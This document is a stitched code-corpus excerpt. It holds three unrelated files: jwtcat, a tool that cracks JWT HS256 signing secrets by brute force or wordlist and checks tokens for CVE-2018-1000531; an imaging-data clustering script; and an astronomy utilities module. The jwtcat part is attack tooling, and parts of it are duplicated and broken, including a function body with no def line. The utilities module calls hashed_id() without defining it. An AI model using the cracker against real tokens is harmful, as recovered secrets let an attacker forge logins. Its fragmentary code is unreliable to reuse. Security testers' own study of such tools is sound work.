'DEBUG',
'INFO',
],
help="Set the logging level",
type=str,
required=False,
)
parser.add_argument(
"-o", "--outfile",
dest="outfile",
help="Define outfile for recovered private keys",
required=False,
type=argparse.FileType(
'w+',
encoding='UTF-8',
errors='ignore'
)
)
parser.add_argument(
"--potfile-disable",
action='store_true',
default=False,
dest="potfile_disable",
help="Do not write potfile",
required=False,
)
parser.add_argument(
"--potfile-path",
default='jwtpot.potfile',
dest="potfile",
help="Specific path to potfile",
required=False,
type=argparse.FileType(
'a+',
encoding='UTF-8',
errors='ignore'
)
)
# parser.add_argument(
# "-tF", "--jwt-file",
# default=argparse.SUPPRESS,
# dest="token_file",
# help="File with JSON Web Tokens to attack",
# required=False,
# type=argparse.FileType(
# 'r',
# encoding='UTF-8',
# errors='ignore'
# )
# )
parser.add_argument(
default=argparse.SUPPRESS,
dest="token",
help="JSON Web Token to attack",
type=str
)
return parser.parse_args()
def bruteforce(charset, minlength, maxlength):
"""This function generates all the different possible combination in a given character space.
Arguments:
charset {string} -- The charset used to generate all possible candidates
minlength {integer} -- The minimum length for candiates generation
maxlength {integer} -- The maximum length for candiates generation
Returns:
[type] -- All the possible candidates
"""
return (''.join(candidate)
for candidate in chain.from_iterable(product(charset, repeat=i)
for i in range(minlength, maxlength + 1)))
def run(token, candidate):
"""This function checks if a candidate can decrypt a JWT token.
Arguments:
token {string} -- An encrypted JWT token to test
candidate {string} -- A candidate word for decoding
Returns:
[boolean] -- Result of the decoding attempt
"""
try:
payload = jwt.decode(token, candidate, algorithm='HS256')
return True
except jwt.exceptions.DecodeError:
logger.debug(f"DecodingError: {candidate}")
return False
except jwt.exceptions.InvalidTokenError:
logger.debug(f"InvalidTokenError: {candidate}")
return False
except Exception as ex:
logger.exception(f"Exception: {ex}")
sys.exit(1)
def is_vulnerable(args):
"""This function checks a JWT token against a well-known vulnerabilities.
Arguments:
args {object} -- The command-line arguments
"""
headers = jwt.get_unverified_header(args.token)
if headers['alg'] == "HS256":
logging.info("JWT vulnerable to HS256 guessing attacks")
elif headers['alg'] == "None":
logging.info("JWT vulnerable to CVE-2018-1000531")
def hs256_attack(args):
"""This function passes down different candidates to the run() function and is required
to handle different types of guessing attack.
Arguments:
args {object} -- The command-line arguments
"""
headers = jwt.get_unverified_header(args.token)
if not headers['alg'] == "HS256":
logging.error("JWT signed using an algorithm other than HS256.")
else:
tqdm_disable = True if args.log_level == "DEBUG" else False
if args.attack_mode == "brute-force":
# Count = ....
for candidate in tqdm(bruteforce(args.charset, args.increment_min, args.increment_max), disable=tqdm_disable):
if run(args.token, candidate):
return candidate
return None
elif args.attack_mode == "wordlist":
word_count = len(open(args.wordlist.name, "r",
encoding="utf-8").readlines())
for entry in tqdm(args.wordlist, disable=tqdm_disable, total=word_count):
if run(args.token, entry.rstrip()):
return entry.rstrip()
return None
if __name__ == "__main__":
main()
| 29.726115 | 238 | 0.610564 | #!/usr/bin/env python3
# Copyright (C) 2017 - 2020 Alexandre Teyar
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import json
import logging
import os
import signal
import sys
import time
from datetime import datetime, timedelta
from itertools import chain, product
import coloredlogs
import jwt
from tqdm import tqdm
logger = logging.getLogger(__name__)
coloredlogs.install(level='DEBUG', milliseconds=True)
def parse_args():
    """Parse the command line.

    Three attack modes are exposed as sub-commands: ``brute-force``,
    ``vulnerable`` and ``wordlist``.  The JWT itself is a positional on the
    main parser and is given after the sub-command and its options, e.g.
    ``jwtcat.py wordlist -w rockyou.txt <TOKEN>``.

    Returns:
        [object] -- The parsed arguments
    """
    parser = argparse.ArgumentParser(
        description="A CPU-based JSON Web Token (JWT) cracker",
        formatter_class=argparse.ArgumentDefaultsHelpFormatter
    )

    subparsers = parser.add_subparsers(
        dest='attack_mode',
        title="Attack-mode",
        required=True
    )

    brute_force_subparser = subparsers.add_parser(
        "brute-force",
        formatter_class=argparse.ArgumentDefaultsHelpFormatter,
    )
    brute_force_subparser.add_argument(
        "-c", "--charset",
        default="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789",
        dest="charset",
        help="User-defined charset",
        type=str,
        required=False,
    )
    brute_force_subparser.add_argument(
        "--increment-min",
        default=1,
        dest="increment_min",
        help="Start incrementing at X",
        type=int,
        required=False,
    )
    brute_force_subparser.add_argument(
        "--increment-max",
        default=8,
        dest="increment_max",
        help="Stop incrementing at X",
        type=int,
        required=False,
    )

    # "vulnerable" takes no options of its own; the returned parser object
    # does not need to be kept (the original bound it to an unused variable).
    subparsers.add_parser(
        "vulnerable",
        formatter_class=argparse.ArgumentDefaultsHelpFormatter,
    )

    wordlist_subparser = subparsers.add_parser(
        "wordlist",
        formatter_class=argparse.ArgumentDefaultsHelpFormatter,
    )
    # UTF-8 with errors ignored: wordlists frequently contain invalid byte
    # sequences and must not abort the run.
    wordlist_subparser.add_argument(
        "-w", "--wordlist",
        default=argparse.SUPPRESS,
        dest="wordlist",
        help="Wordlist of private key candidates",
        required=True,
        type=argparse.FileType(
            'r',
            encoding='UTF-8',
            errors='ignore'
        )
    )

    parser.add_argument(
        "-lL", "--log-level",
        # NOTE: the default is the int logging.INFO while user-provided
        # values are the strings below; logger.setLevel() accepts both.
        default=logging.INFO,
        dest="log_level",
        choices=[
            'DEBUG',
            'INFO',
        ],
        help="Set the logging level",
        type=str,
        required=False,
    )
    parser.add_argument(
        "-o", "--outfile",
        dest="outfile",
        help="Define outfile for recovered private keys",
        required=False,
        type=argparse.FileType(
            'w+',
            encoding='UTF-8',
            errors='ignore'
        )
    )
    parser.add_argument(
        "--potfile-disable",
        action='store_true',
        default=False,
        dest="potfile_disable",
        help="Do not write potfile",
        required=False,
    )
    parser.add_argument(
        "--potfile-path",
        default='jwtpot.potfile',
        dest="potfile",
        help="Specific path to potfile",
        required=False,
        type=argparse.FileType(
            'a+',
            encoding='UTF-8',
            errors='ignore'
        )
    )
    parser.add_argument(
        default=argparse.SUPPRESS,
        dest="token",
        help="JSON Web Token to attack",
        type=str
    )

    return parser.parse_args()
def bruteforce(charset, minlength, maxlength):
    """Lazily yield every string over *charset* of the given lengths.

    Arguments:
        charset {string} -- Characters used to build candidates
        minlength {integer} -- Shortest candidate length generated
        maxlength {integer} -- Longest candidate length generated (inclusive)

    Returns:
        generator -- Candidates in length order, shortest first.
    """
    for size in range(minlength, maxlength + 1):
        for combo in product(charset, repeat=size):
            yield ''.join(combo)
def run(token, candidate):
    """Try one key candidate against an HS256-signed JWT.

    Arguments:
        token {string} -- The JWT to verify
        candidate {string} -- Candidate signing key

    Returns:
        [boolean] -- True if the candidate verifies the token's signature.

    Note: exits the process on unexpected errors.  A token that is signed
    with the candidate but fails claim validation (e.g. expired) still
    raises InvalidTokenError and is reported as a miss.
    """
    try:
        # BUG FIX: PyJWT's decode() takes ``algorithms`` (a list); the old
        # ``algorithm=`` keyword is ignored by PyJWT 1.x and rejected by
        # 2.x, which made every candidate fail.
        jwt.decode(token, candidate, algorithms=["HS256"])
        return True
    except jwt.exceptions.DecodeError:
        logger.debug(f"DecodingError: {candidate}")
        return False
    except jwt.exceptions.InvalidTokenError:
        logger.debug(f"InvalidTokenError: {candidate}")
        return False
    except Exception as ex:
        logger.exception(f"Exception: {ex}")
        sys.exit(1)
"""This function checks a JWT token against a well-known vulnerabilities.
Arguments:
args {object} -- The command-line arguments
"""
headers = jwt.get_unverified_header(args.token)
if headers['alg'] == "HS256":
logging.info("JWT vulnerable to HS256 guessing attacks")
elif headers['alg'] == "None":
logging.info("JWT vulnerable to CVE-2018-1000531")
def hs256_attack(args):
    """Feed candidate secrets to run() according to the selected attack mode.

    Arguments:
        args {object} -- The command-line arguments

    Returns:
        The secret that verified the token, or None when no candidate
        matched (also None when the token is not HS256-signed).
    """
    headers = jwt.get_unverified_header(args.token)
    if headers['alg'] != "HS256":
        logging.error("JWT signed using an algorithm other than HS256.")
        return None

    # Hide the progress bar under debug logging so bar redraws do not
    # interleave with per-candidate log lines.
    tqdm_disable = args.log_level == "DEBUG"

    if args.attack_mode == "brute-force":
        for candidate in tqdm(bruteforce(args.charset, args.increment_min,
                                         args.increment_max),
                              disable=tqdm_disable):
            if run(args.token, candidate):
                return candidate
        return None
    elif args.attack_mode == "wordlist":
        # Count lines first so tqdm can show a total. Use a context manager
        # so the extra handle is closed (the original leaked it), and count
        # lazily instead of materialising the whole file with readlines().
        with open(args.wordlist.name, "r", encoding="utf-8") as handle:
            word_count = sum(1 for _ in handle)
        for entry in tqdm(args.wordlist, disable=tqdm_disable, total=word_count):
            candidate = entry.rstrip()
            if run(args.token, candidate):
                return candidate
        return None
def main():
    """Entry point: parse CLI arguments and run the selected JWT attack."""
    # Bind start_time before the try block so the KeyboardInterrupt handler
    # can always report an elapsed time (previously a Ctrl+C raised while
    # parsing arguments caused a NameError on `start_time`).
    start_time = time.time()
    try:
        args = parse_args()
        logger.setLevel(args.log_level)
        if args.attack_mode == "vulnerable":
            is_vulnerable(args)
        elif args.attack_mode in ('brute-force', 'wordlist'):
            logger.warning(
                "For attacking complex JWT, it is best to use compiled, GPU accelerated password crackers such as Hashcat and John the Ripper which offer more advanced techniques such as raw brute forcing, rules-based, and mask attacks.")
            logger.info(
                "Pour yourself a cup (or two) of ☕ as this operation might take a while depending on the size of your wordlist.")
            candidate = hs256_attack(args)
            if candidate:
                logger.info(f"Private key found: {candidate}")
                if args.outfile:
                    args.outfile.write(f"{args.token}:{candidate}\n")
                    logging.info(f"Private key saved to: {args.outfile.name}")
                # Save the private secret into a file in case sys.stdout is unresponsive
                if not args.potfile_disable:
                    args.potfile.write(f"{args.token}:{candidate}\n")
            else:
                logger.info(
                    "The private key was not found in this wordlist. Consider using a bigger wordlist or other types of attacks.")
        elapsed_time = time.time() - start_time
        logger.info(f"Finished in {elapsed_time} sec")
    except KeyboardInterrupt:
        logger.error("CTRL+C pressed, exiting...")
        elapsed_time = time.time() - start_time
        logger.info(f"Interrupted after {elapsed_time} sec")
    except Exception as e:
        # Log the full traceback rather than just the message so
        # unexpected failures remain debuggable.
        logger.exception(e)
# Script entry point.
if __name__ == "__main__":
    main()
| 1,811 | 0 | 23 |
b330967e3f8aafec1bee4bafd68911efd75bd2be | 4,523 | py | Python | MSI-segmentation/MSI-segmentation_L1.0.py | hanghu1024/MSI-segmentation | fe5082575fb2c06a2baffaf89f6da7627fa165ac | [
"MIT"
] | 4 | 2021-06-22T15:27:02.000Z | 2022-03-05T17:07:31.000Z | MSI-segmentation/MSI-segmentation_L1.0.py | hanghu1024/MSI-segmentation | fe5082575fb2c06a2baffaf89f6da7627fa165ac | [
"MIT"
] | null | null | null | MSI-segmentation/MSI-segmentation_L1.0.py | hanghu1024/MSI-segmentation | fe5082575fb2c06a2baffaf89f6da7627fa165ac | [
"MIT"
] | 1 | 2021-12-07T12:51:45.000Z | 2021-12-07T12:51:45.000Z | #===========================================
# import modules, defs and variables
#===========================================
exec(open("./external.py").read())
exec(open("./defs.py").read())
exec(open("./config.py").read())
print('Finish modules, defs and variables import')
#===========================================
# L1.0 import data
#===========================================
df_pixel_rep = pd.read_csv(L0outputDir)
pixel_rep = df_pixel_rep.values.astype(np.float64)
print('Finish pixel raw data import')
#===========================================
# L1.0 data processing and manipulate
#===========================================
nPCs = retrace_columns(df_pixel_rep.columns.values, 'PC')
pcs = pixel_rep[:, 2:nPCs + 2]
# make folders for multivariate analysis
OutputFolder = locate_OutputFolder2(L0outputDir)
OutputFolder = locate_OutputFolder3(OutputFolder, 'multivariate clustering')
os.mkdir(OutputFolder)
# initiate a df for labels
df_pixel_label = pd.DataFrame(data=df_pixel_rep[['line_index', 'spectrum_index']].values.astype(int), columns = ['line_index','spectrum_index'])
print('Finish raw data processing')
#===========================================
# L1.0 GMM ensemble clustering
#===========================================
n_component = generate_nComponentList(n_components, span)
for i in range(repeat): # may repeat several times
for j in range(n_component.shape[0]): # ensemble with different n_component value
StaTime = time.time()
gmm = GMM(n_components = n_component[j], max_iter = 500) # max_iter does matter, no random seed assigned
labels = gmm.fit_predict(pcs)
# save data
index = j+1+i*n_component.shape[0]
title = 'No.' + str(index) + '_' +str(n_component[j]) + '_' + str(i)
df_pixel_label[title] = labels
SpenTime = (time.time() - StaTime)
# progressbar
print('{}/{}, finish classifying {}, running time is: {} s'.format(index, repeat*span, title, round(SpenTime, 2)))
print('Finish L1.0 GMM ensemble clustering, next step: L1.1 data process, plot and export data')
#===========================================
# L1.1 data processing and manipulate
#===========================================
pixel_label = relabel(df_pixel_label)
# parse dimension
NumLine = np.max(df_pixel_label.iloc[:,0])+1
NumSpePerLine = np.max(df_pixel_label.iloc[:,1])+1
# parameter for plotting
aspect = AspectRatio*NumSpePerLine/NumLine
# organize img
img = pixel_label.T.reshape(pixel_label.shape[1], NumLine, NumSpePerLine)
print('Finish L1.1 data process')
#===========================================
# L1.1 ensemble results in mosaic plot, save images
#===========================================
# mosaic img show
# parameters:
w_fig = 20 # default setting
ncols = ncols_L1
nrows = math.ceil((img.shape[0]-2)/ncols)
h_fig = w_fig * nrows * (AspectRatio + 0.16) / ncols # 0.2 is the space for title parameters
columns = df_pixel_label.columns.values
fig = plt.figure(figsize=(w_fig, h_fig))
fig.subplots_adjust(hspace= 0, wspace=0.01, right=0.95)
for i in range(1, img.shape[0]+1):
ax = fig.add_subplot(nrows, ncols, i)
im = ax.imshow(img[i-1], cmap=cm.tab20, aspect = aspect, vmin=0,vmax=19, interpolation='none')
ax.set_xticks([])
ax.set_yticks([])
# title
title = columns[i+1]
ax.set_title(title, pad=8, fontsize = 15)
# colorbar
cbar_ax = fig.add_axes([0.96,0.1,0.01,0.8])
cbar = fig.colorbar(im, cax=cbar_ax, ticks=[0.5,1.4,2.3,3.3,4.3,5.1,6.2,7,8.1,9,10,10.9,11.8,12.7,13.6,14.7,15.6,16.6,17.5,18.5])
cbar.ax.set_yticklabels([0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19]) #hard code
cbar.ax.tick_params(labelsize=10)
SaveDir = OutputFolder + '\\ensemble_clustering_plot.png'
plt.savefig(SaveDir, dpi=dpi)
plt.close()
print('Finish L1.1 GMM ensemble clustering result plotting, saving .csv file')
#===========================================
# save data
#===========================================
# organize a dataframe for relabel data
df_pixel_relabel = pd.DataFrame(pixel_label.astype(int), columns = df_pixel_label.columns.values[2:df_pixel_label.shape[1]])
df_pixel_relabel.insert(0, 'spectrum_index', df_pixel_label.iloc[:,1])
df_pixel_relabel.insert(0, 'line_index', df_pixel_label.iloc[:,0])
SaveDir = OutputFolder + '\\pixel_label.csv'
df_pixel_relabel.to_csv(SaveDir, index=False, sep=',')
print('L1 is done, please check output results at: \n{}'.format(OutputFolder))
| 37.380165 | 144 | 0.605129 | #===========================================
# import modules, defs and variables
#===========================================
exec(open("./external.py").read())
exec(open("./defs.py").read())
exec(open("./config.py").read())
print('Finish modules, defs and variables import')
#===========================================
# L1.0 import data
#===========================================
df_pixel_rep = pd.read_csv(L0outputDir)
pixel_rep = df_pixel_rep.values.astype(np.float64)
print('Finish pixel raw data import')
#===========================================
# L1.0 data processing and manipulate
#===========================================
nPCs = retrace_columns(df_pixel_rep.columns.values, 'PC')
pcs = pixel_rep[:, 2:nPCs + 2]
# make folders for multivariate analysis
OutputFolder = locate_OutputFolder2(L0outputDir)
OutputFolder = locate_OutputFolder3(OutputFolder, 'multivariate clustering')
os.mkdir(OutputFolder)
# initiate a df for labels
df_pixel_label = pd.DataFrame(data=df_pixel_rep[['line_index', 'spectrum_index']].values.astype(int), columns = ['line_index','spectrum_index'])
print('Finish raw data processing')
#===========================================
# L1.0 GMM ensemble clustering
#===========================================
n_component = generate_nComponentList(n_components, span)
for i in range(repeat): # may repeat several times
for j in range(n_component.shape[0]): # ensemble with different n_component value
StaTime = time.time()
gmm = GMM(n_components = n_component[j], max_iter = 500) # max_iter does matter, no random seed assigned
labels = gmm.fit_predict(pcs)
# save data
index = j+1+i*n_component.shape[0]
title = 'No.' + str(index) + '_' +str(n_component[j]) + '_' + str(i)
df_pixel_label[title] = labels
SpenTime = (time.time() - StaTime)
# progressbar
print('{}/{}, finish classifying {}, running time is: {} s'.format(index, repeat*span, title, round(SpenTime, 2)))
print('Finish L1.0 GMM ensemble clustering, next step: L1.1 data process, plot and export data')
#===========================================
# L1.1 data processing and manipulate
#===========================================
pixel_label = relabel(df_pixel_label)
# parse dimension
NumLine = np.max(df_pixel_label.iloc[:,0])+1
NumSpePerLine = np.max(df_pixel_label.iloc[:,1])+1
# parameter for plotting
aspect = AspectRatio*NumSpePerLine/NumLine
# organize img
img = pixel_label.T.reshape(pixel_label.shape[1], NumLine, NumSpePerLine)
print('Finish L1.1 data process')
#===========================================
# L1.1 ensemble results in mosaic plot, save images
#===========================================
# mosaic img show
# parameters:
w_fig = 20 # default setting
ncols = ncols_L1
nrows = math.ceil((img.shape[0]-2)/ncols)
h_fig = w_fig * nrows * (AspectRatio + 0.16) / ncols # 0.2 is the space for title parameters
columns = df_pixel_label.columns.values
fig = plt.figure(figsize=(w_fig, h_fig))
fig.subplots_adjust(hspace= 0, wspace=0.01, right=0.95)
for i in range(1, img.shape[0]+1):
ax = fig.add_subplot(nrows, ncols, i)
im = ax.imshow(img[i-1], cmap=cm.tab20, aspect = aspect, vmin=0,vmax=19, interpolation='none')
ax.set_xticks([])
ax.set_yticks([])
# title
title = columns[i+1]
ax.set_title(title, pad=8, fontsize = 15)
# colorbar
cbar_ax = fig.add_axes([0.96,0.1,0.01,0.8])
cbar = fig.colorbar(im, cax=cbar_ax, ticks=[0.5,1.4,2.3,3.3,4.3,5.1,6.2,7,8.1,9,10,10.9,11.8,12.7,13.6,14.7,15.6,16.6,17.5,18.5])
cbar.ax.set_yticklabels([0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19]) #hard code
cbar.ax.tick_params(labelsize=10)
SaveDir = OutputFolder + '\\ensemble_clustering_plot.png'
plt.savefig(SaveDir, dpi=dpi)
plt.close()
print('Finish L1.1 GMM ensemble clustering result plotting, saving .csv file')
#===========================================
# save data
#===========================================
# organize a dataframe for relabel data
df_pixel_relabel = pd.DataFrame(pixel_label.astype(int), columns = df_pixel_label.columns.values[2:df_pixel_label.shape[1]])
df_pixel_relabel.insert(0, 'spectrum_index', df_pixel_label.iloc[:,1])
df_pixel_relabel.insert(0, 'line_index', df_pixel_label.iloc[:,0])
SaveDir = OutputFolder + '\\pixel_label.csv'
df_pixel_relabel.to_csv(SaveDir, index=False, sep=',')
print('L1 is done, please check output results at: \n{}'.format(OutputFolder))
| 0 | 0 | 0 |
0717646489a2d80fa3f23fe03a050b78b42cbf8a | 40,498 | py | Python | smhr_session/utils.py | alexji/smhr-session | 98cf3dd5da737752e704cffb005f729dfc2711dd | [
"MIT"
] | null | null | null | smhr_session/utils.py | alexji/smhr-session | 98cf3dd5da737752e704cffb005f729dfc2711dd | [
"MIT"
] | null | null | null | smhr_session/utils.py | alexji/smhr-session | 98cf3dd5da737752e704cffb005f729dfc2711dd | [
"MIT"
] | null | null | null | # coding: utf-8
""" Utility functions for Spectroscopy Made Hard """
__author__ = "Andy Casey <andy@astrowizici.st>"
# Standard library
import os
import logging
import platform
import string
import sys
import traceback
import tempfile
from six import string_types
from collections import Counter, OrderedDict
try:
from subprocess import getstatusoutput
except ImportError: # python 2
from commands import getstatusoutput
from hashlib import sha1 as sha
from random import choice
from socket import gethostname, gethostbyname
# Third party imports
import numpy as np
import astropy.table
from scipy import stats, integrate, optimize
# Diatomic molecules: map a molecule name (in either element ordering) to
# the atomic number of its heavier constituent element.
common_molecule_name2Z = {
    'Mg-H': 12,'H-Mg': 12,
    'C-C': 6,
    'C-N': 7, 'N-C': 7, #TODO
    'C-H': 6, 'H-C': 6,
    'O-H': 8, 'H-O': 8,
    'Fe-H': 26,'H-Fe': 26,
    'N-H': 7, 'H-N': 7,
    'Si-H': 14,'H-Si': 14,
    'Ti-O': 22,'O-Ti': 22,
    'V-O': 23,'O-V': 23,
    'Zr-O': 40,'O-Zr': 40
}
# Molecule name -> numeric species code. The code concatenates the two
# atomic numbers, lighter element first: e.g. MgH -> 112 (H=1, Mg=12),
# TiO -> 822 (O=8, Ti=22).
common_molecule_name2species = {
    'Mg-H': 112,'H-Mg': 112,
    'C-C': 606,
    'C-N': 607,'N-C': 607,
    'C-H': 106,'H-C': 106,
    'O-H': 108,'H-O': 108,
    'Fe-H': 126,'H-Fe': 126,
    'N-H': 107,'H-N': 107,
    'Si-H': 114,'H-Si': 114,
    'Ti-O': 822,'O-Ti': 822,
    'V-O': 823,'O-V': 823,
    'Zr-O': 840,'O-Zr': 840
}
# Inverse lookup: species code -> the two element symbols.
common_molecule_species2elems = {
    112: ["Mg", "H"],
    606: ["C", "C"],
    607: ["C", "N"],
    106: ["C", "H"],
    108: ["O", "H"],
    126: ["Fe", "H"],
    107: ["N", "H"],
    114: ["Si", "H"],
    822: ["Ti", "O"],
    823: ["V", "O"],
    840: ["Zr", "O"]
}
__all__ = ["element_to_species", "element_to_atomic_number", "species_to_element", "get_common_letters", \
"elems_isotopes_ion_to_species", "species_to_elems_isotopes_ion", \
"find_common_start", "extend_limits", "get_version", \
"approximate_stellar_jacobian", "approximate_sun_hermes_jacobian",\
"hashed_id"]
logger = logging.getLogger(__name__)
def equilibrium_state(transitions, columns=("expot", "rew"), group_by="species",
    ycolumn="abundance", yerr_column=None):
    """
    Perform linear fits to the abundances provided in the transitions table
    with respect to x-columns.

    :param transitions:
        A table of atomic transitions with measured equivalent widths and
        abundances.

    :param columns: [optional]
        The names of the columns to make fits against.

    :param group_by: [optional]
        The name of the column in `transitions` to calculate states.

    :param ycolumn: [optional]
        The name of the ordinate column to fit. (The original implementation
        accepted this argument but silently ignored it, always fitting the
        hard-coded "abundance" column.)

    :param yerr_column: [optional]
        The name of a column holding uncertainties on `ycolumn`, if any.

    :returns:
        A dict keyed by group identifier; each value maps an x-column name
        to the tuple ``(m, b, median_y, (std_y, std_m), N)`` from `fit_line`.
    """

    lines = {}

    transitions = transitions.group_by(group_by)
    for i, start_index in enumerate(transitions.groups.indices[:-1]):
        end_index = transitions.groups.indices[i + 1]

        group_lines = {}
        for x_column in columns:
            x = transitions[x_column][start_index:end_index]
            # Use the requested ordinate column instead of hard-coding it.
            y = transitions[ycolumn][start_index:end_index]
            if yerr_column is not None:
                try:
                    yerr = transitions[yerr_column][start_index:end_index]
                except KeyError:
                    logger.exception("Cannot find yerr column '{}':".format(
                        yerr_column))
                    yerr = np.ones(len(y))
            else:
                yerr = np.ones(len(y))

            # Only use finite values; treat masked entries as non-finite
            # (narrowed from the original bare `except: pass`).
            finite = np.isfinite(x * y * yerr)
            if hasattr(finite, "filled"):
                finite = finite.filled(False)

            if not np.any(finite):
                continue

            m, b, medy, stdy, stdm, N = fit_line(x, y, None)
            group_lines[x_column] = (m, b, medy, (stdy, stdm), N)

        identifier = transitions[group_by][start_index]
        if group_lines:
            lines[identifier] = group_lines

    return lines
def spectral_model_conflicts(spectral_models, line_list):
    """
    Identify abundance conflicts in a list of spectral models.

    :param spectral_models:
        A list of spectral models to check for conflicts.

    :param line_list:
        A table of energy transitions.

    :returns:
        A list containing tuples of spectral model indices where there is a
        conflict about which spectral model to use for the determination of
        stellar parameters and/or composition.
    """

    line_list_hashes = line_list.compute_hashes()

    # Map each transition hash to the indices of the models that use it.
    transition_hashes = {}
    for i, spectral_model in enumerate(spectral_models):
        for transition in spectral_model.transitions:
            transition_hash = line_list.hash(transition)
            transition_hashes.setdefault(transition_hash, [])
            transition_hashes[transition_hash].append(i)

    # Which of the transition_hashes appear more than once?
    conflicts = []
    # Python 3 fix: dict.iteritems() no longer exists; use items().
    for transition_hash, indices in transition_hashes.items():
        if len(indices) < 2: continue

        # OK, what element is this transition?
        match = (line_list_hashes == transition_hash)
        element = line_list["element"][match][0].split()[0]

        # Of the spectral models that use this spectral hash, what are they
        # measuring?
        conflict_indices = []
        for index in indices:
            if element not in spectral_models[index].metadata["elements"]:
                # This transition is not being measured in this spectral model.
                continue
            else:
                # This spectral model is modeling this transition.
                # Does it say this should be used for the determination of
                # stellar parameters or composition?
                if spectral_models[index].use_for_stellar_parameter_inference \
                or spectral_models[index].use_for_stellar_composition_inference:
                    conflict_indices.append(index)

        if len(conflict_indices) > 1:
            conflicts.append(conflict_indices)

    return conflicts
# List the periodic table here so that we can use it outside of a single
# function scope (e.g., 'element in utils.periodic_table')
# Element symbols in atomic-number order (H=1 ... Rf=104), with the
# lanthanoid and actinoid series already spliced into their places.
periodic_table = (
    "H He "
    "Li Be B C N O F Ne "
    "Na Mg Al Si P S Cl Ar "
    "K Ca Sc Ti V Cr Mn Fe Co Ni Cu Zn Ga Ge As Se Br Kr "
    "Rb Sr Y Zr Nb Mo Tc Ru Rh Pd Ag Cd In Sn Sb Te I Xe "
    "Cs Ba La Ce Pr Nd Pm Sm Eu Gd Tb Dy Ho Er Tm Yb "
    "Lu Hf Ta W Re Os Ir Pt Au Hg Tl Pb Bi Po At Rn "
    "Fr Ra Ac Th Pa U Np Pu Am Cm Bk Cf Es Fm Md No Lr Rf"
).split()
hashed_id = hashed_id()
def approximate_stellar_jacobian(stellar_parameters, *args):
    """ Approximate the Jacobian of the stellar parameters and
    minimisation parameters, based on calculations from the Sun

    Note: unpacks the first four entries of `stellar_parameters` in the
    order (teff, vt, logg, feh). Returns the transposed (4, 4) matrix.
    """

    logger.info("Updated approximation of the Jacobian")

    teff, vt, logg, feh = stellar_parameters[:4]

    # This is the black magic: hard-coded linear responses of each balance
    # statistic to each stellar parameter (presumably fit on the Sun — see
    # docstring; coefficients are not re-derivable from this file).
    full_jacobian = np.array([
        [ 5.4393e-08*teff - 4.8623e-04, -7.2560e-02*vt + 1.2853e-01, 1.6258e-02*logg - 8.2654e-02, 1.0897e-02*feh - 2.3837e-02],
        [ 4.2613e-08*teff - 4.2039e-04, -4.3985e-01*vt + 8.0592e-02, -5.7948e-02*logg - 1.2402e-01, -1.1533e-01*feh - 9.2341e-02],
        [-3.2710e-08*teff + 2.8178e-04, 3.8185e-03*vt - 1.6601e-02, -1.2006e-02*logg - 3.5816e-03, -2.8592e-05*feh + 1.4257e-03],
        [-1.7822e-08*teff + 1.8250e-04, 3.5564e-02*vt - 1.1024e-01, -1.2114e-02*logg + 4.1779e-02, -1.8847e-02*feh - 1.0949e-01]
    ])
    return full_jacobian.T
def approximate_sun_hermes_jacobian(stellar_parameters, *args):
    """
    Approximate the Jacobian of the stellar parameters and
    minimisation parameters, based on calculations using the Sun
    and the HERMES atomic line list, after equivalent widths
    were carefully inspected.

    Note: unpacks the first four entries of `stellar_parameters` in the
    order (teff, vt, logg, feh). Returns the transposed (4, 4) matrix.
    """

    # logger.info("Updated approximation of the Jacobian")

    teff, vt, logg, feh = stellar_parameters[:4]

    # full_jacobian = np.array([
    # [ 4.4973e-08*teff - 4.2747e-04, -1.2404e-03*vt + 2.4748e-02, 1.6481e-02*logg - 5.1979e-02, 1.0470e-02*feh - 8.5645e-03],
    # [-9.3371e-08*teff + 6.9953e-04, 5.0115e-02*vt - 3.0106e-01, -6.0800e-02*logg + 6.7056e-02, -4.1281e-02*feh - 6.2085e-02],
    # [-2.1326e-08*teff + 1.9121e-04, 1.0508e-03*vt + 1.1099e-03, -6.1479e-03*logg - 1.7401e-02, 3.4172e-03*feh + 3.7851e-03],
    # [-9.4547e-09*teff + 1.1280e-04, 1.0033e-02*vt - 3.6439e-02, -9.5015e-03*logg + 3.2700e-02, -1.7947e-02*feh - 1.0383e-01]
    # ])

    # After culling abundance outliers,..
    full_jacobian = np.array([
        [ 4.5143e-08*teff - 4.3018e-04, -6.4264e-04*vt + 2.4581e-02, 1.7168e-02*logg - 5.3255e-02, 1.1205e-02*feh - 7.3342e-03],
        [-1.0055e-07*teff + 7.5583e-04, 5.0811e-02*vt - 3.1919e-01, -6.7963e-02*logg + 7.3189e-02, -4.1335e-02*feh - 6.0225e-02],
        [-1.9097e-08*teff + 1.8040e-04, -3.8736e-03*vt + 7.6987e-03, -6.4754e-03*logg - 2.0095e-02, -4.1837e-03*feh - 4.1084e-03],
        [-7.3958e-09*teff + 1.0175e-04, 6.5783e-03*vt - 3.6509e-02, -9.7692e-03*logg + 3.2322e-02, -1.7391e-02*feh - 1.0502e-01]
    ])
    return full_jacobian.T
def approximate_stellar_jacobian_2(stellar_parameters, *args):
    """ Approximate the Jacobian of the stellar parameters and
    minimisation parameters, based on calculations from the Sun

    Variant of `approximate_stellar_jacobian` whose parameter vector is
    ordered (teff, logg, vt, feh) instead of (teff, vt, logg, feh);
    the matrix columns are permuted to match.
    """

    logger.info("Updated approximation of the Jacobian {}".format(stellar_parameters))

    teff, logg, vt, feh = stellar_parameters[:4]
    #if np.isnan(teff): teff = 5000.; logger.info("jacobian: teff=nan->5000")
    #if np.isnan(logg): logg = 2.0; logger.info("jacobian: logg=nan->2.0")
    #if np.isnan(vt): vt = 1.75; logger.info("jacobian: vt=nan->1.75")
    #if np.isnan(feh): feh = -2.0; logger.info("jacobian: feh=nan->-2.0")

    # This is the black magic: same empirical coefficients as
    # `approximate_stellar_jacobian`, columns reordered for (logg, vt) swap.
    full_jacobian = np.array([
        [ 5.4393e-08*teff - 4.8623e-04, 1.6258e-02*logg - 8.2654e-02, -7.2560e-02*vt + 1.2853e-01, 1.0897e-02*feh - 2.3837e-02],
